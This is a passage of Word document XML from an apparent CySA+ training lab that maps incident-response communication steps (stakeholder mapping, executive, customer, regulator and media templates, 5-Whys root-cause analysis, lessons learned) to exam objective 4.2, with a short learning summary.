      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 9 — Stakeholder map → CySA+ 4.2 final crosswalk</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4824"/>
        <w:gridCol w:w="4824"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
            <w:shd w:val="clear" w:fill="1F6FEB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
            <w:shd w:val="clear" w:fill="1F6FEB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>CySA+ 4.2 bullet</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>1 stakeholder map</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Stakeholder identification and communication</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>2 executive template</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Communications — internal / executive</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>3 customer template</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Communications — Customer communication</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>4 regulator template</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Communications — Regulatory reporting</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>5 media template</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Communications — Public relations, Media</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>6 law enforcement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Communications — Law enforcement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>7 5-Whys</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Root cause analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>8 lessons learned</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Lessons learned</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>What You Learned</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Identify every stakeholder for a sev-1 incident and pick the right channel for each.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Draft executive, customer, regulator, and media communications.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Run a 5-Whys RCA that targets process, not people.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Close the incident with a structured Lessons Learned register that feeds back into the IR life cycle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:shd w:val="clear" w:fill="FDF3E7"/>
        <w:ind w:left="144" w:right="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="C87A1E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Test it: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>You should be able to identify every stakeholder for a sev-1 incident and pick the right channel for each.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00FC693F" w:rsidRPr="0006063C" w:rsidSect="00034616">
      <w:footerReference w:type="default" r:id="rId31"/>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372"/>
        <w:sz w:val="17"/>
      </w:rPr>
      <w:t xml:space="preserve">Page </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="5B6372"/>
        <w:sz w:val="17"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
      <w:instrText xml:space="preserve">PAGE</w:instrText>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="5B6372"/>
        <w:sz w:val="17"/>
      </w:rPr>
      <w:t xml:space="preserve"> of </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="5B6372"/>
        <w:sz w:val="17"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
      <w:instrText xml:space="preserve">NUMPAGES</w:instrText>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="5B6372"/>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61B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6FE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